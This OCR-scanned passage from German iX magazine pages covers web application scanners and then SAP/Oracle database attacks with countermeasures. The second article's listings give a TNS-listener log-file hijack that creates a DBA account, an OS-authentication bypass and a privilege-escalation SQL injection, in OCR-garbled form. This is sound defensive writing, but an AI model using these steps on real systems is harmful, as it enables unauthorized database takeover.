festlegen. Einige Produkte bie- 
ten zudem die Möglichkeit, ei- 
gene Prüfungen zu integrieren. 
Die Auswahl an Prüfungen, oft 
Policy genannt, sollte unter ei- 
nem eigenen Namen speicher- 
bar sein. So kann man bei spä- 
teren Scan-Durchläufen wieder 
auf das gleiche Regelwerk zu- 
rückgreifen — was vor allem in 
Hinblick auf die Vergleich- 
barkeit mehrerer Ergebnisse 
wichtig ist. 


Aussagekräftige 
Fehlermeldungen 


Je nach Scanner kann der An- 
wender weitere Konfiguratio- 
nen durchführen, um eine Ap- 
plikation möglichst komplett 
und effizient zu prüfen. Bei- 
spielsweise antworten viele 
Webserver mit angepassten 
Fehlerseiten (z. B. 200 OK 
„Es ist ein Fehler aufgetre- 
ten“) und nicht mit den Feh- 
lercodes des HTTP-Protokolls 
(z. B. Fehler 404 „Objekt un- 
bekannt“ oder Fehler 500 
„Interner Fehler“). Da die 
Klassifizierung von Schwach- 
stellen hauptsächlich anhand 
von Fehlerreaktionen des Ser- 


Hersteller 
Produkt 
Herkunft 


Website (siehe auch iXlink): 


Acunetix Cenzic 

Acunetix WVS Hailstorm 
Eigenentwicklung, seit Eigenentwicklung, seit 
2005 verfügbar 2005 verfügbar 
Www.acunetix.com Www.cenzic.com 


vers erfolgt, muss man diese 
angepassten Fehlerseiten dem 
Scanner vorab „zur Kenntnis 
geben“. Typischerweise ge- 
schieht das mithilfe regulärer 
Ausdrücke. 

Da viele Webanwendungen 
erst nach der Anmeldung des 
Benutzers funktionieren, be- 
steht die größte Herausforde- 
rung beim Erfassen und Scan- 
nen im „Session Handling“, 
der Handhabung von Logins 
und Benutzer-Sessions. Es 
existieren unterschiedliche Au- 
thentifizierungsmöglichkeiten. 
Häufig erfolgt die Anmeldung 
über eine Formularseite, in der 
der Benutzer Name und Pass- 
wort angibt. Weiter finden sich 
Anmeldeverfahren wie „Basic 
Authentication“, SSL-Client- 
Zertifikate oder One-Time- 
Passwort. Um Anwendungen 
mit Logins prüfen zu können, 
muss der jeweilige Scanner 
diese unterschiedlichen Login- 
Mechanismen unterstützen. 

Nach einer erfolgreichen 
Anmeldung erhält der Benut- 
zer eine Session-ID. Sie be- 
findet sich beispielsweise in 
Cookies oder URL-Parame- 
tern. Generell können Session- 
IDs dem an sich statuslosen 
HTTP-Protokoll Benutzersit- 
zungen zuordnen. Ein guter 
Scanner erkennt nicht nur 


automatisch solche Session- 
Mechanismen, sondern bietet 
dem Prüfer zusätzlich die Op- 
tion, komplexere Methoden zu 
konfigurieren. Schwierigkeiten 
bereiten in der Praxis oftmals 
„ungewöhnliche“ Arten, Ses- 
sion-IDs zu handhaben. Bei- 
spielsweise führen SAP-An- 
wendungen oft die Session-ID 
im Pfad ((...)/sap session-id 
/asp/(...)), womit einige Scan- 
ner nicht zurechtkommen. 
Abhilfe können hier in vielen 
Fällen reguläre Ausdrücke 
schaffen, die man zum Erken- 
nen der Session-IDs im Scan- 
ner definiert. 


Anfang und 


Ende erkennen 


Vorgegebene Navigationspfa- 
de erschweren manchmal das 
automatische Anmelden. In 
einigen Webanwendungen ist 
eine erfolgreiche Anmeldung 
nur dann möglich, wenn ein 
Benutzer die Seiten login- 
schrittl.html und login- 
schritt2.html hintereinander 
aufruft. Die meisten Scanner 
können solche definierten Na- 
vigationspfade vorab aufneh- 
men und ihnen bei einer not- 
wendigen Anmeldung richtig 
folgen. 


Mindestens genauso wich- 
tig wie die automatische An- 
meldung ist das Erkennen 
von Logouts bei einer Weban- 
wendung. Übersieht das ein 
Scanner, laufen viele Sicher- 
heitsprüfungen ins Leere, da 
die beim Crawlen gefunde- 
nen Links oft nur mit einer 
gültigen Anmeldung zu errei- 
chen sind. Ein Scanner muss 
daher nach einem erkannten 
Logout selbsttätig eine erneu- 
te Anmeldung starten können. 

Alle gängigen Webapplika- 
tions-Scanner bereiten die ge- 
fundenen Schwachstellen so 
auf, dass der Verantwortliche 
sie in weiterführenden Pro- 
zessen beheben kann. Dazu 
klassifizieren und bewerten sie 
die Schwachstellen. Die Ri- 
sikobewertung erfolgt anhand 
definierter Standardwerte. 
SQL-Injection-Schwachstellen 
gelten beispielsweise immer 
als hohes Risiko. In der Pra- 
xis erlauben die meisten Scan- 
ner eine Anpassung dieser 
Bewertung, falls sich beispiels- 
weise bei einer manuellen Prü- 
fung ergibt, dass der mögliche 
Schaden einer Schwachstelle 
geringer ist als vom Entwick- 
ler des Scanners ursprünglich 
angenommen. 

Die meisten Scanner erläu- 
tern in ihrer Auswertung die 


bekannte Schwachstellen in Plattformen 
SQL Injection 

Cross Site Scripting 

File Indusion 

Manipulation von URL-Parametern 
Privilege Escalation 

Session-ID-Qualität 


BSES<sES<s 


SESSsEs sES<S 


Prüf-Policies 

Login-Daten 

Logout-Erkennung 

Prüfmuster (z. B. um XSS zu provozieren) 


I ıES< 


S<ES<S 


Erweiterung durch eigene Prüfungen 
Zentrales Management für mehrere Scanner 


128 


ms 


< 


als Hailstorm Enterprise ARC 


HP IBM NT Objectives 
Webinspect Appscan NTO Spider 
Ursprünglich ein Produkt Ursprünglich ein Produkt Eigenentwicklung, seit 
der Firma SPI-Dynamics der Firma Sanctum (seit 2005 verfügbar 
(seit 2000). 2007 kaufte 2000), die an Watchfire 
HP SPI-Dynamics. verkauft wurde. 2007 
kaufte IBM Watchfire. 
www.hp.com www.watchfire.com www.ntobjectives.com 
v NG - 
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gefundenen Schwachstellen 
und geben direkt auf der 
Anwendungsoberfläche Hin- 
weise für deren Beseitigung. 
Alternativ kann der Benutzer 
für einzelne oder mehrere 
Schwachstellen-Scans Berich- 
te generieren. Je nach Ziel- 
gruppe hat er die Wahl zwi- 
schen vordefinierten Vorlagen 
wie Management-Reports oder 
detaillierte Berichte für Ent- 
wickler. 


Kein Ersatz 
für Handarbeit 


Webapplikations-Scanner kön- 
nen aber nicht die manuelle 
Überprüfung durch einen Si- 
cherheitsexperten ersetzen. 
Den automatisierten Werkzeu- 
gen sind Grenzen gesetzt, vor 
allem wenn es um komplexe 
Schwachstellen geht. Etwa im 
Falle sogenannter „Race Condi- 
tions“, Konstellationen, die das 
Entdecken und Ausnutzen ei- 
ner Schwachstelle nur dann er- 
lauben, wenn Zugriffe auf die 
Applikation in einer bestimm- 
ten Reihenfolge erfolgen. 

Auch sind etwa Schwä- 
chen im Autorisierungsmodell 
innerhalb einer Anwendung 
für einen Scanner meistens 
nicht erkennbar. Angenom- 
men, der GET-Parameter 
..7konto=12345 definiert in 
einer Onlinebanking-Überwei- 
sung das Konto, von dem der 
Überweisungsbetrag abge- 
bucht werden soll. Hat eine 
Änderung des Parameters zur 
Folge, dass die Webanwen- 
dung das Geld von einem 
fremden Konto abbucht, han- 
delt es sich um eine Schwach- 
stelle. Sie offenbart sich dem 
Scanner jedoch nicht durch 
die Antwortseite des Webser- 
vers. Sowohl bei der richtigen 
als auch bei der manipulier- 
ten Überweisung vermeldet 
die Anwendung eine erfolg- 
reiche Transaktion. 

Ähnlich ist es bei Logikfeh- 
lern. Schwachstellen entstehen 
in diesem Zusammenhang 
aufgrund fehlender Plausibi- 
litätsprüfungen. Führt im oben 
genannten Beispiel der On- 
linebanking-Anwendung die 
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Veränderung eines Parameters 
von einem positiven Überwei- 
sungsbetrag in einen negati- 
ven dazu, dass Geld auf ein 
Konto gutgeschrieben wird, 
statt es abzubuchen, so liegt 
ein Logikfehler vor. Diese 
Schwachstelle findet ein Scan- 
ner nicht, da die Information 
fehlt, dass ein definierter Pa- 
rameter nur positive Werte 
annehmen darf. Ob ein Si- 
cherheitsexperte diese Art von 
Schwachstelle mithilfe eige- 
ner manueller Definitionen 
finden kann, muss er im Ein- 
zelfall bei jedem Scanner aus- 
probieren. 

Obwohl die Anzahl der 
falsch-positiven Resultate bei 
Webapplikations-Scannern in 
der Praxis relativ niedrig ist, 
erspart einem das nicht das 
manuelle Überprüfen einzel- 
ner gemeldeter Schwachstel- 
len. Überdies zeigt die Er- 
fahrung, dass ein Scanner 
Schwachstellen durchaus kor- 
rekt identifizieren kann, jedoch 
im Einzelfall eine erfolgreiche 
Ausnutzung aufgrund be- 
stimmter Bedingungen nur 
sehr schwer möglich ist. Das 
ist beispielsweise bei SQL- 
Injection-Schwachstellen der 
Fall, die ein Scanner anhand 
einer Datenbankfehlermel- 
dung beim Einschleusen eines 
Anführungszeichens korrekt 
als Schwachstelle erkennt. 
Falls jedoch die Anzahl der 
Zeichen, die man eingeben 
kann, limitiert ist, kann nie- 
mand die Schwachstelle aus- 
nutzen. 


Übersicht der 
Scan-Werkzeuge 


Nachfolgend werden die zur- 
zeit am Markt gängigsten 
Webapplikations-Scanner kurz 
beschrieben. Für die Auswahl 
eines passenden Scanners ist 
es empfehlenswert, eine eige- 
ne Produktevaluation durch- 
zuführen, da je nach Art der 
Anwendung, der eingesetzten 
Authentifizierungsmethoden 
oder auch der organisatori- 
schen Rahmenbedingungen 
die Scanner qualitativ un- 
terschiedliche Ergebnisse lie- 
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fern. Auf welches Produkt 
letztendlich die Wahl fällt, 
hängt in der Praxis oftmals 
nicht alleine vom reinen Scan- 
Ergebnis ab, sondern auch da- 
von, wie sich der Scanner in 
bestehende Umgebungen und 
organisatorische Prozesse ein- 
binden lässt. 

Der Web Vulnerability 
Scanner von Acunetix ist zwar 
noch nicht so lange am Markt 
wie die etablierten Produkte 
von HP und IBM, kann je- 
doch mit ihnen durchaus mit- 
halten. Alle wichtigen Anfor- 
derungen, beispielsweise eine 
einfach Bedienung, erfüllt er. 
Eigene Prüfungen lassen sich 
besonders einfach in den 
Scanner integrieren, ohne dazu 
komplexen Javascript-Code 
wie bei Cenzics Hailstorm 
verwenden zu müssen. Wie 
HP und IBM bietet Acunetix 
zusätzliche Hilfsanwendun- 


gen — beispielsweise ein Pass- 
wort-Brute-Force-Tool -, die 
für einen Auditor bei einer 
manuellen Überprüfung hilf- 
reich sein können. 


Von Vorteil: 
Session-ID-Prüfung 


Appscan ist zusammen mit 
Webinspect bisher eines der 
bekanntesten Produkte. Der ur- 
sprüngliche Hersteller Watch- 
fire wurde im Juni 2007 von 
IBM aufgekauft. Das Unter- 
nehmen integriert Appscan 
derzeit in seine Rational-Pro- 
duktlinie. Der Scanner über- 
zeugt sowohl hinsichtlich sei- 
nes Funktionsumfangs als 
auch in den Scan-Ergebnis- 
sen. Hervorzuheben ist vor 
allem die sehr gute Erken- 
nung von mit Javascript ge- 
nerierten Links beim Crawlen 


Die verschiedenen 
Angriffstechniken 


Cross-Site Scripting (XSS): 
Dieser Angriff zielt immer auf 
den Browser eines ahnungs- 
losen Anwenders einer Web- 
applikation ab. Die Schwach- 
stelle besteht darin, dass die 
Anwendung die benutzerdefi- 
nierten Eingabewerte nicht 
überprüft, sondern sie ungefil- 
tert an den Browser zurücklie- 
fert. Über die Ausführung von 
schadhaftem Code im Brow- 
ser des Opfers kann ein An- 
greifer an vertrauliche Daten 
wie Session-Informationen ge- 
langen oder die volle Kontrol- 
le über den Browser erhalten. 


Injection-Schwachstellen: Bei 
dieser Art von Schwachstelle 
leitet die Webanwendung be- 
nutzerdefinierte Eingabewerte 
ungeprüft an nachgelagerte 
Systeme. Durch die Manipula- 
tion dieser Werte können die 
Systeme angegriffen werden. 
Ein Beispiel dafür ist eine 
SQL-Injection-Schwachstelle, 
bei der ein Angreifer beliebige 
SQL-Statements innerhalb der 
nachgelagerten Datenbank aus- 
führen kann. 


File Inclusion: Webanwen- 
dungen, die für File-Inclusion- 
Schwachstellen anfällig sind, 
erlauben es, Dateien des Web- 
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servers in die Anwendung ein- 
zubinden. Ist es möglich, das 
von entfernten Systemen aus 
durchzuführen, so spricht man 
von einer Remote File Inclu- 
sion. Mithilfe dieses Angriffs 
kann es einem Hacker unter 
Umständen gelingen, die voll- 
ständige Kontrolle über den 
Webserver zu erhalten. 


Session-Angriffe: Zum Bei- 
spiel Session Fixation. Ziel 
des Angriffs ist es, einen Be- 
nutzer eine dem Angreifer 
vorab bekannte Session-ID 
verwenden zu lassen, die der 
legitime Applikationsbenut- 
zer anschließend durch seine 
Anmeldung „aktiviert“. Hier- 
zu weist der Angreifer dem 
Benutzer vorab die ihm be- 
kannte Session-ID zu, etwa 
durch präparierte Links oder 
unter Ausnutzung von Cross- 
Site-Scripting-Schwachstellen 
in der Anwendung. Meldet sich 
dieser Benutzer dann an der 
Anwendung an, verwendet er 
die vorab vom Angreifer „fi- 
xierte“ Session-ID. Mit der 
Anmeldung wurde diese Ses- 
sion aktiviert und der Angrei- 
fer kann jetzt ebenfalls über 
die ID im Kontext des Benut- 
zers auf die Anwendung zu- 
greifen. 


einer Webanwendung. Über- 
dies bietet er einige zusätzliche 
Anwendungen, die den Si- 
cherheitsexperten bei der ma- 
nuellen Überprüfung unter- 
stützen. Beispielsweise kann 
er mit einem Token Analyzer 
die Zufälligkeit von Session- 
IDs prüfen. 

Hailstorm von Cenzic ist 
unter den hier genannten Pro- 
dukten sicherlich als eines 
der mächtigsten einzustufen, 
doch die zahlreichen Konfi- 
gurationsmöglichkeiten in ei- 
ner relativ unübersichtlichen 
GUI erschweren leider die 
Bedienung. Alle von Cenzic 
mitgelieferten Schwachstel- 
lenprüfungen sind im Pro- 
dukt einsehbar und können 
um eigene erweitert werden — 
jedoch nur mithilfe nicht 
ganz einfach verständlicher 
Javascript-Codeteile. Für Fir- 
men, die eigene Teams von 
Auditoren für die Prüfung 
von Webanwendungen ein- 
setzen, kann dieses Werk- 
zeug gerade aufgrund seiner 
hohen Konfigurierbarkeit das 
geeignete sein. 

Der NTOSpider von NTOb- 
jectives ist das jüngste der hier 
genannten Produkte. Obwohl 
die GUI im Vergleich zu den 
etablierten Scannern weniger 
ansprechend ist, lässt sich der 
Scanner sehr einfach bedienen. 
Mit NTOSpider kann man ei- 
nen Scan mit wenig Konfigu- 
rationsaufwand durchführen, 
da er viele Anwendungseigen- 
schaften automatisch erkennt. 
Beim Evaluieren des Produkts 
sollten Interessenten jedoch 
testen, ob es mit den in der 
Webanwendung vorhandenen 
Authentifizierungs- und Ses- 
sion-Handling-Methoden tat- 
sächlich automatisch zurecht- 
kommt. 


Unterstützung 


bei der Abnahme 


Im Gegensatz zu allen ande- 
ren genannten Produkten prüft 
NTOSpider nur auf Schwach- 
stellen in der Webanwendung 
selbst. Prüfungen auf der Web- 
server-Ebene, zum Beispiel 
auf eine aktivierte HTTP- 


PUT-Methode, führt er nicht 
durch. Dank seiner Einfachheit 
ist dieser Scanner vor allem bei 
Abnahmeprozessen von Web- 
anwendungen eine große Hilfe. 
Gemeinsam mit Appscan 
ist Webinspect das bekanntes- 
te Produkt. Auch hier wurde 
der ursprüngliche Hersteller 
SPI Dynamics im Juni 2007 
aufgekauft, neuer Eigentümer 
des Scanners ist HP. Webin- 
spect überzeugt in fast allen 
Belangen. Hervorzuheben ist 
unter anderem die Vielzahl 
zusätzlicher Hilfsanwendun- 
gen zur Unterstützung einer 
manuellen Überprüfung. Nütz- 
lich ist vor allem auch der 
SQL Injector, ein Tool, das 
mithilfe einer gefundenen 
SQL-Injection-Schwachstelle 
in der Lage ist, alle Daten aus 
der Backend-Datenbank auto- 
matisiert auszulesen. 


Fazit 


Webapplikations-Scanner sind 
ein wichtiges Hilfsmittel bei 
der Überprüfung von Weban- 
wendungen auf Schwachstel- 
len. Sie ersetzen zwar nicht 
die manuelle Überprüfung 
durch einen Auditor, unterstüt- 
zen ihn dabei aber recht weit — 
nicht zuletzt dank zahlreicher 
Hilfsanwendungen. Einfach 
zu erkennende Schwachstellen 
lassen sich mit solchen Scan- 
nern effizient finden. Für die 
Auswahl eines Webapplika- 
tions-Scanners ist eine sorg- 
fältige Evaluierung notwen- 
dig. Sie sollte sich an den 
oben genannten Grundfunk- 
tionen und Erfahrungen aus 
der Praxis orientieren. (ur) 


STEFFEN TRÖSCHER 


ist Berater bei der cirosec 


GmbH in Heilbronn. 
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es brennt; Acht Web 
Application Firewalls, 
iX 8/2008; S. 70 


Eix-ink ix0808126 IR 


1X 8/2008 


© Copyright by Heise Zeitschriften Verlag GmbH & Co. KG. Veröffentlichung und Vervielfältigung nur mit Genehmigung des Heise Zeitschriften Verlags. 


Datenbanksicherheit 


stellung, Gehaltsdaten oder die 

rabattierten Einkaufspreise — in 
Oracle-Datenbanken speichern viele 
Unternehmen vertrauliche Informatio- 
nen. Sie brauchen deshalb optimalen 
Schutz. Während für Applikationen oft- 
mals aufwendige Berechtigungskonzepte 
existieren, zeigen die Erfahrungen und 
Studien der Autoren, dass Unternehmen 
Datenbanksicherheit häufig immer noch 
stiefmütterlich behandeln. Erschwerend 
kommt hinzu, dass manche Best-Prac- 
tice-Empfehlungen im SAP/Oracle- 
Umfeld nicht umsetzbar sind. 

Deutsche und internationale Gesetze 
verlangen von Unternehmen, die Inte- 
grität der Finanzbuchhaltungsdaten si- 
cherzustellen. Doch vor allem durch 
die Anforderungen des Sarbanes-Oxley 
Act von 2002 und der ins Haus stehen- 
den 8. EU-Direktive gelangt (s. iX- 
Link) das Thema „Sicherheit der IT- 
Infrastruktur“ auf die Schreibtische 
von Geschäftsführung und Wirtschafts- 
prüfern. Sie müssen Datenbanksicher- 
heit ganzheitlich betrachten: als eine 
Kombination aus vorbeugenden und 
aufdeckenden Maßnahmen, die unauto- 
risierte Datenzugriffe verhindert oder 
sie zumindest schnell bemerkt. 

Dieser Artikel beschäftigt sich mit 
den speziellen Risiken im SAP/Oracle- 
Umfeld und mit Einschränkungen bei 
der Umsetzung von Sicherheitsmaßnah- 
men. Er konzentriert sich auf die Vor- 
beugung; mit der Nutzung von Proto- 
kollen (Auditing) für die Untersuchung 
von Attacken wird sich ein späterer 
Artikel befassen. 

Eine typische SAP-Umgebung be- 
steht aus einer Oracle-Datenbank, einem 
oder mehreren Applikationsservern und 
den Clients, die mit einem SAP-GUI 
oder einem Browser auf den Applika- 
tionsserver zugreifen. Applikations- und 
Datenbankserver stehen dabei oft ohne 
Firewall im internen Netz. Aus ihm her- 
aus können Angreifer deshalb direkt mit 
der Datenbank kommunizieren. Dafür 
benötigen sie die IP-Adresse und die 
Port-Nummer der Datenbank sowie die 
SID (Service Identifier). Sie bezeichnet 
die Datenbankinstanz, auf die zugegrif- 
fen werden soll, und ist im SAP-Umfeld 
ein dreistelliger alphanumerischer Wert, 
zum Beispiel PO1. 

Wer die IP-Adresse des Applikations- 
servers kennt, kann mit dem Tool sap- 
info [a] der SAP AG die SID und den 
Hostnamen des Datenbankservers ohne 
Authentifizierung auslesen. Aus der IP- 
Adresse des Datenbankservers lässt sich 
unter Oracle 9i und älteren Versionen 


F inanzdaten, Stücklisten in der Her- 
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Oracle-DB und SAP: 
Angriffe und Gegenmaßnahmen 


Eine sichere Bank 


Jan Kästle, Stefan Hölzner 


Das Gespann aus SAP und Oracle-Datenbank ist hierzulande 
eine der am häufigsten anzutreffenden ERP-Plattformen. 

Über die spezifischen Sicherheitsrisiken dieser Kombination und 
praktische Schutzmaßnahmen wurde bislang wenig geschrieben - 


Zeit für einen Überblick. 


allerhand ermitteln. Dazu reicht es, dass 
der TNS-Listener ungeschützt installiert 
ist — der Default in diesen Versionen. 
Dann liefern seine Befehle status und 
services die SID und weitere Daten, bei- 
spielsweise den Pfad zur Datenbank. 
Ist der TNS-Listener durch ein Pass- 
wort geschützt, verrät er diese Informa- 
tionen nicht mehr jedem. Seit 10g sichert 
Oracle das Programm standardmäßig so, 
dass sich die SID aus dem Netz nicht di- 
rekt ermitteln lässt. Trotzdem kann man 
sie immer noch durch einen Wörterbuch- 
oder Brute-Force-Angriff erraten. Ein 
Brute-Force-Angriff auf die SID eines 
SAP-Systems ist in angemessener Zeit 
durchführbar, da sie nur drei Zeichen 
lang ist. Das Werkzeug sidguess [b] er- 
ledigt diese Aufgabe automatisch. 


Sind weder die IP-Adresse des Da- 
tenbankservers noch die des Applika- 
tionsservers bekannt, ermittelt ein Port- 
Scanner die von Oracle verwendete 
Port-Nummer. In den meisten Fällen 
liegt sie zwischen 1520 und 1530, 
Standard ist 1527. nmap [c] findet den 
Server schnell: 


nmap -sS -PO -p 1520-1530 10.0.0.1-255 


Ein typischer Angriff auf Oracle-Da- 
tenbanken zielt auf die zahlreichen 
Standardbenutzer, die das Installa- 
tionsskript automatisch mit einem all- 
gemein bekannten Passwort anlegt. 
Welche das im Einzelnen sind, hängt 
von der eingesetzten Version und den 
installierten Paketen ab. Typische Stan- 
dardbenutzer, deren Passwörter oft 
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TV Datenbanksicherheit 


man ein starkes Passwort wählen, 
nicht benötigte mit 


Befehle führt der Server bei jedem 
Aufruf von sqlplus aus. 

— Anschließendes Schreiben von SQL- 
Befehlen mit der Log-Funktion des 
TNS-Listeners in diese gefälschte Log- 
Datei. Sie erzeugen einen neuen Daten- 


Listing 1: TNS-Listener öffnet die Tür 


CONNECT_DATA=(CID=(PROGRAN=)(HOST=) (USER=jkaestle)) 
COMMAND=Log_file) (ARGUNENTS=4) (SERVICE=192,168.200.128:1522) 
VERSION=169869568) 
VALUE=/disk2/app/oracle/product/10.2.0/db_1/sqlplus/admin/glogin.sal)))" \ 
-h 192.168.200.128 -p 1522 --106 

‚Itnsend10g.pl --rauend "set term off 

create user hackär identified by hack3r; 


alter user outln password expire account lock; 


abschalten. Das Passwort sollte 
mit expire markiert sein, sodass 


grant dba to hackdr; beim erneuten Aktivieren — sollte bankbenutzer. 
4 en 1522 106 der Benutzer doch einmal benö- - Ändern der Log-Datei auf den alten 
tigt werden — ein neues erforder-- Wert. 


lich ist [e]. Wegen des von Oracle Beim nächsten Anmelden eines Ad- 


Listing 2: Lokaler Benutzer mit SAP-Rechten bis 10g Release 2 verwendeten 
schwachen Hashing-Algorithmus 
ist bei der Wahl der Passwörter 
besonders auf die Komplexität zu 
achten. Seit Oracle 10g sind die 
meisten Standardbenutzer nach 
der Installation gesperrt. Zudem 


ministrators führt sq/plus automatisch 
das Skript glogin.sql aus, das einen Be- 
nutzer mit DBA-Rechten anlegt. Da der 
sqlplus-Befehl host Betriebssystemkom- 
mandos ausführt, könnte ein Angreifer 
auf dem beschriebenen Weg sogar eine 
Rembote-Shell öffnen, die ihm Zugriff 


useradd sapadn 

su sapadn 

cd /opt/oracle/instantclient_10_2/ 
‚Isqlplus /9192.168.200.128:1522/SAP 


Connected to: 
Oracle Database 10g Enterprise Edition Release 10.2.0.2.0 - Production 
With the Partitioning, OLAP and Data Mining options 


unverändert bleiben, sind OUTLN und 
DBSNMP. Für SAP gibt es einen zu- 
sätzlichen Datenbankbenutzer, mit dem 
der Applikationsserver auf die Daten- 
bank zugreift. In älteren SAP-Releases 
heißt dieser Benutzer SAPSAP; ab 
Release 4.6C hängt der Name von der 
SID ab und lautet SAP<SID>, also 
beispielsweise SAPPOI. opwg aus der 
oat-Suite [d] testet eine Reihe von 
Standardbenutzern auf die Default- 
Passwörter. 


Mehr Privilegien 
durch Schwachstellen 


Hat ein Angriff Zugang zu einem un- 
privilegierten Benutzerkonto eröffnet, 
gibt es verschiedene Wege, administra- 
tive Rechte zu erlangen; beispielsweise 
durch eine der zahlreichen Privilege- 
Escalation-Schwachstellen oder durch 
Einsatz eines Crackers für die Pass- 
wort-Hashes der administrativen Be- 
nutzer. Diese Hash-Werte kann bei- 
spielsweise der Benutzer DBSNMP aus 
dem View dba_users auslesen. 

Die Schutzmaßnahme für dieses An- 
griffszenario liegt auf der Hand: Für 
die benötigten Standardbenutzer sollte 


erzwingt der Oracle Universal In- 
staller ein neues Passwort für die 
aktiven Datenbankbenutzer. Bei einer 
manuellen Installation ist dies jedoch 
nicht der Fall. 

Um weitergehende Passwortangriffe 
zu verhindern, sollten Benutzerkonten 
der Datenbank nach einer geringen Zahl 
fehlgeschlagener Anmeldeversuche ge- 
sperrt werden. Seit 10g Release 2 erle- 
digt Oracle dies standardmäßig nach 
zehn Versuchen. Für ältere Versionen 
muss der Administrator diese Einstel- 
lung manuell vornehmen. Der Benutzer 
SYS kann jedoch beliebig viele Versu- 
che unternehmen, sich als SYSDBA an- 
zumelden. 

Ist die Verwaltung des TNS-Listeners 
ohne Authentifizierung über das Netz 
möglich (standardmäßig für alle Versio- 
nen vor 10g), lassen sich unter anderem 
Betriebssystemdateien beschreiben. Mit 
einem Trick kann diese Funktion den 
Zugriff auf die Datenbank oder das Be- 
triebssystem eröffnen. Dabei setzt der 
Angreifer die Log-Datei des TNS-Liste- 
ners neu, wozu er den Pfad zur Oracle- 
Installation kennen muss. Diese Infor- 
mation kann man aus dem TNS-Listener 
mit services auslesen. Die Vorgehens- 
weise ist wie folgt (s. Listing 1): 

- Ändern des Pfades der Log-Datei zu 
glogin.sql. Die darin enthaltenen SQL- 


A-TRACT 


@ In vielen Unternehmen läuft die ERP-Software von SAP auf einer Oracle-Datenbank. 
Vor allem Oracle bis 9i enthält in der Voreinstellung viele Angriffsmöglichkeiten. 


© Eine der größten Schwachstellen ist der TNS-Listener, dessen Netzverkehr man 
durch Access Control Lists einschränken sollte. Mehr Sicherheit lässt sich durch 
das Abschalten seiner Fernadministration und das Setzen eines Passworts schaffen. 


© Oracle bringt viele Standardbenutzer mit allgemein bekannten Passwörtern mit. 
Diese sollte der Administrator deaktivieren oder ihr Passwort ändern. 
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auf das Betriebssystem gibt. 
Für Oracle 9i und früher unterbindet 
der Eintrag 


ADMIN_RESTRICTIONS_<LISTENER_NAME> = ON 


in der Datei listener.ora die Remote- 
Administration und damit den Zugriff 
auf den TNS-Listener. 

Zusätzlich sollte man mit dem Pro- 
gramm Insrctl ein Passwort auf den 
TNS-Listener setzen, sodass Unberech- 
tigte die Befehle services und status 
nicht mehr nutzen können. 


Ohne Passwort 
in die Datenbank 


Einen weiteren Weg in die Datenbank 
öffnet die besondere Konfiguration von 
Oracle für SAP. Auf dem Datenbankser- 
ver richtet SAP bei der Installation die 
Betriebssystembenutzer ora<sid> und 
<sid>adm (für Unix/Linux) beziehungs- 
weise <S/D>ADM und SAPSERVICE 
<SID> (für Windows) ein. Das Pro- 
gramm legt sie zudem in der Datenbank 
mit dem Präfix OPS$ und mit der Au- 
thentifizierungsmethode identified exter- 
nally an. Dadurch erledigt das Betriebs- 
system die Authentifizierung alleine. 
Damit dies auch funktioniert, wenn diese 
Benutzer auf dem Applikationsserver an- 
gemeldet sind, ist der init.ora-Parameter 
remote_os_authent auf true zu setzen [f]. 
Dann vertraut die Datenbank dem Be- 
triebssystem, dass diese Benutzer sich 
korrekt angemeldet haben. Oracle emp- 
fiehlt hingegen diesen Parameter aus Si- 
cherheitsgründen auf false zu setzen [e]. 

Diesen Mechanismus verwenden 
Backup-Werkzeuge und der Applika- 
tionsserver für die Anmeldung bei der 
Datenbank. Aus der Tabelle SAPUSER 
kann die SAP-Applikation als OPS$- 
Benutzer das (verschlüsselte) Daten- 
bankpasswort von SAP<SI/D> auslesen 
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Datenbanksicherheit 


Listing 3: 
SQL-Injektion verschafft DBA-Rechte 


select username, granted_role from user_role_privs; 

USERNANE GRANTED_ROLE 

SCOTT CONNECT 

SCOTT RESOURCE 

create or replace function getdba return varchar2 authid 

current_user is 

pragna autonomous_transaction; 

begin 

execute immediate "GRANT DBA TO SCOTT'; 

CoMNIT; 

RETURN "DBA'; 

END; 

| 

grant execute on getdba to public; 

exec dbms_cde_inpdp.bunp_sequence("SYS',"BBB""| SCOTT. 
GETDBAO | |""BBB",0); 

select username, granted_role from user_role_privs; 

USERNANE GRANTED_ROLE 


SCOTT CONNECT 


DBA 
SCOTT RESOURCE 


und als dieser regulär auf die Datenbank 
zugreifen. Die Benutzer SAPSERVICE 
<SID> beziehungsweise <sid>adm be- 
sitzen die Rolle SAPDBA. Oft sind die 
Rechte für die OPS$-Konten zu um- 
fassend vergeben, sodass sie uneinge- 
schränkt auf das Schema des SAP 
<SID>-Benutzers zugreifen können, 
das heißt auf alle SAP-Tabellen. An- 
dernfalls können diese Rechte durch 
eine Privilege-Escalation-Schwachstelle 
erlangt werden. 

Ein Angreifer braucht also nur noch 
den Benutzer <sid>adm beziehungs- 
weise SAPSERVICE<SID> auf sei- 
nem eigenen Rechner anzulegen und 
kann sich als dieser ohne weitere Au- 
thentifizierung an der Oracle-Daten- 
bank anmelden. Er hat somit vollen 
Zugriff auf die SAP-Tabellen erhalten 
(s. Listing 2). 

Da dies lediglich die Kommunika- 
tion mit dem TNS-Listener über das 
Netz voraussetzt, bleibt als Schutz nur, 
den Zugriff auf die IP-Adressen der 
Applikationsserver einzuschränken. In 
der TNS-Listener Konfigurationsdatei 


sqinet.ora lässt sich diese Einstellung 
so vornehmen: 


TCP.VALIDNODE_CHECKING = YES 
TCP.INVITED_NODES = (<IP-Adresse 1>, 7 
<IP-Adresse 2>,-) 


Diese Absicherungsmaßnahme kann 
IP-Spoofing-Attacken jedoch nicht ver- 
hindern. Mehr Schutz bietet nur die 
Netzsegmentierung mit einer Firewall. 
In ihr sollte lediglich der Zugriff auf 
die vom SAP-GUI genutzten Ports auf 
dem Applikationsserver erlaubt sein. 
Zusätzlich kann ein SAP-Router als 
Proxy zwischen dem GUI und dem Ap- 
plikationsserver fungieren. 


Patches: 
Ein Hindernisrennen 


Neben Sicherheitslücken durch eine fal- 
sche Konfiguration öffnen technische 
Mängel ein weiteres Einfallstor in die 
Datenbank. Als Schutz davor sollte sie 
immer auf dem aktuellen Patch-Stand 
sein. Oracle veröffentlicht vierteljährlich 
ein Critical Patch Update (CPU) mit al- 
len Korrekturen. Die Oracle-Datenbank 
eines SAP-Systems lässt sich jedoch oft 
wegen Kompatibilitätsproblemen mit 
Patches der SAP AG nicht aktualisieren. 
So hat die Firma beispielsweise für Ora- 
cle 10.2.0.2 die CPUs von Oktober 2006 
bis Juli 2007 nicht freigegeben. Erst das 
Update von Oktober 2007 durften Ad- 
ministratoren wieder einspielen. Ohne- 
